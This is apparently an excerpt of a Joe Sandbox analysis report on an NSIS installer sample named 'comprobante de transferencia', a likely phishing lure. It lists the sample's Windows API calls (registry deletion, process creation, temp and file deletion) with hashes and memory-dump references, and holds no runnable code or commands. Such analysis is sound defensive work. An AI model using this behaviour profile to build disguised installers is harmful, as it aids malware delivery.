                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                            • Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
                                            • Opcode Fuzzy Hash: e1c014fc95bc23661624503e4522ac552ab2ae52810cd3c8af91e79be824a7f3
                                            • Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040639B
                                            • wsprintfW.USER32 ref: 004063D6
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004063EA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%S.dll$UXTHEME$\
                                            • API String ID: 2200240437-1946221925
                                            • Opcode ID: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                            • Instruction ID: 69ae2dd3acfd93707f2d49264f8241546f9c5af57f384429b5f7a638f8549ddd
                                            • Opcode Fuzzy Hash: 593f7811ea388f5a47145f6632eb7b382babc1da37006913c6aa5b6fd682aae8
                                            • Instruction Fuzzy Hash: 6BF0B170910119A7DF14A764DC0DF9B366CA700744F604476AA07F11D1EB7CEB65C7E9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                            • GlobalFree.KERNEL32(?), ref: 004028E9
                                            • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                            • CloseHandle.KERNEL32(?), ref: 00402914
                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                            • String ID:
                                            • API String ID: 2667972263-0
                                            • Opcode ID: 9a3160f5cd84cbbbd2e3a7cb11dde0b3899aca8dbbcd50ea506cda6ea3599f41
                                            • Instruction ID: c1a5639659a60ac5c9bd0712390274ed5d57598099091cca2b2fb0d84b3ff26b
                                            • Opcode Fuzzy Hash: 9a3160f5cd84cbbbd2e3a7cb11dde0b3899aca8dbbcd50ea506cda6ea3599f41
                                            • Instruction Fuzzy Hash: 1621AC72C04128BBCF216FA5CD49D9E7E79EF09324F24023AF520762E1C7795D418BA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CountTick$wsprintf
                                            • String ID: ... %d%%
                                            • API String ID: 551687249-2449383134
                                            • Opcode ID: 4fb43e65bf4ce807e6280a461f5ece61806fbeac42c13317a2feefb909c66b96
                                            • Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
                                            • Opcode Fuzzy Hash: 4fb43e65bf4ce807e6280a461f5ece61806fbeac42c13317a2feefb909c66b96
                                            • Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                            • wsprintfW.USER32 ref: 004049DF
                                            • SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: ItemTextlstrlenwsprintf
                                            • String ID: %u.%u%s%s$&B
                                            • API String ID: 3540041739-2907463167
                                            • Opcode ID: 770447f35da1f277c6ac85a7c0a518b54e4afc88f1f53f93581291e47916563d
                                            • Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
                                            • Opcode Fuzzy Hash: 770447f35da1f277c6ac85a7c0a518b54e4afc88f1f53f93581291e47916563d
                                            • Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406311
                                            • CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                            • CharNextW.USER32(?,00000000,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406325
                                            • CharPrevW.USER32(?,?,76BF3420,00436800,00434000,00403245,00436800,00436800,00403492), ref: 00406338
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: *?|<>/":
                                            • API String ID: 589700163-165019052
                                            • Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                            • Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
                                            • Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                            • Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateDirectoryW.KERNEL32(?,?,00436800), ref: 0040568B
                                            • GetLastError.KERNEL32 ref: 0040569F
                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
                                            • GetLastError.KERNEL32 ref: 004056BE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: s@
                                            • API String ID: 3449924974-2533359417
                                            • Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                            • Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
                                            • Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                            • Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                            • CompareFileTime.KERNEL32(-00000014,?,004095A8,004095A8,00000000,00000000,004095A8,00435000,?,?,00000031), ref: 004017CD
                                              • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                              • Part of subcall function 00405179: lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                              • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                              • Part of subcall function 00405179: lstrcatW.KERNEL32(004216C8,00403160), ref: 004051D4
                                              • Part of subcall function 00405179: SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID:
                                            • API String ID: 1941528284-0
                                            • Opcode ID: c3151a3063b88bf1de305e53cc32ec19a0b05aaf286facdde9d328bfaff361cf
                                            • Instruction ID: c9b8be7f26e3bb8f886377ec20d84860bb913b523593c9fc4340e73ed15d4a17
                                            • Opcode Fuzzy Hash: c3151a3063b88bf1de305e53cc32ec19a0b05aaf286facdde9d328bfaff361cf
                                            • Instruction Fuzzy Hash: 0041D531900114FACF20BFB5CC45EAE3A79EF45369B20423BF022B10E2D73C8A119A6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                            • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                            • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
                                            • Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
                                            • Opcode Fuzzy Hash: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
                                            • Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetDlgItem.USER32(?,?), ref: 00401D00
                                            • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                            • DeleteObject.GDI32(00000000), ref: 00401D4B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                            • String ID:
                                            • API String ID: 1849352358-0
                                            • Opcode ID: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
                                            • Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
                                            • Opcode Fuzzy Hash: 658c1924fa8f238d90a05b66423510a0a4ae35360fa9b687f360e54937d3183e
                                            • Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetDC.USER32(?), ref: 00401D59
                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                            • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                            • CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                            • String ID:
                                            • API String ID: 3808545654-0
                                            • Opcode ID: fdc5f2c1fa15137141abf920e2b66139c7875423c911a418118fe9d73be23372
                                            • Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
                                            • Opcode Fuzzy Hash: fdc5f2c1fa15137141abf920e2b66139c7875423c911a418118fe9d73be23372
                                            • Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$Timeout
                                            • String ID: !
                                            • API String ID: 1777923405-2657877971
                                            • Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                            • Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
                                            • Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                            • Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                            • lstrlenW.KERNEL32(0040A5A8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                            • RegSetValueExW.ADVAPI32(?,?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                            • RegCloseKey.ADVAPI32(?,?,?,0040A5A8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID:
                                            • API String ID: 1356686001-0
                                            • Opcode ID: defa2ff258bcc6687091bef99af7fb9620e9464aea729066e8816d9215c342de
                                            • Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
                                            • Opcode Fuzzy Hash: defa2ff258bcc6687091bef99af7fb9620e9464aea729066e8816d9215c342de
                                            • Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 00405179: lstrlenW.KERNEL32(004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                              • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,004216C8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                              • Part of subcall function 00405179: lstrcatW.KERNEL32(004216C8,00403160), ref: 004051D4
                                              • Part of subcall function 00405179: SetWindowTextW.USER32(004216C8,004216C8), ref: 004051E6
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                              • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                              • Part of subcall function 004056FA: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                              • Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730
                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 3585118688-0
                                            • Opcode ID: af52580a24e9da0efc31eebc354f7a4cc3df4363f0d7d6f825fb150053a5d77b
                                            • Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
                                            • Opcode Fuzzy Hash: af52580a24e9da0efc31eebc354f7a4cc3df4363f0d7d6f825fb150053a5d77b
                                            • Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • DestroyWindow.USER32(?,00000000,00402F6A,?,?,?,00434000,00403500,?), ref: 00402D9D
                                            • GetTickCount.KERNEL32 ref: 00402DBB
                                            • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                            • ShowWindow.USER32(00000000,00000005,?,?,00434000,00403500,?), ref: 00402DE6
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                            • String ID:
                                            • API String ID: 2102729457-0
                                            • Opcode ID: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                            • Instruction ID: 84c2018479133c1a06627c8befec1d2e01839f263682f94960fa8353d768859b
                                            • Opcode Fuzzy Hash: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                            • Instruction Fuzzy Hash: 29F0DA30909220BFC7616B24FD4CADB7BA5BB44B11B4145BAF005A11E4D3B95C81CA9D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 0040511C
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040516D
                                              • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                            • Instruction ID: de30b2b7089f6fefb08e10281d0b4b3c30be484ea7ef601637de59f0c5b2ee24
                                            • Opcode Fuzzy Hash: b772241499b65645409c9fc33f4f8930a921897f459ee4d2270c46b35a81506b
                                            • Instruction Fuzzy Hash: 18015E71A0060CABDF216F11DD80B9B3A26EB94354F104036FA05792D2C3BA8C929B6D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405C3C
                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00434000,00403268,00436000,00436800,00436800,00436800,00436800,00436800,00436800,00403492), ref: 00405C57
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.7679488894.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.7679460528.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679523145.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679551633.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000002.00000002.7679583927.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_400000_comprobante de transferencia.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: nsa
                                            • API String ID: 1716503409-2209301699
                                            • Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                            • Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
                                            • Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                            • Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64
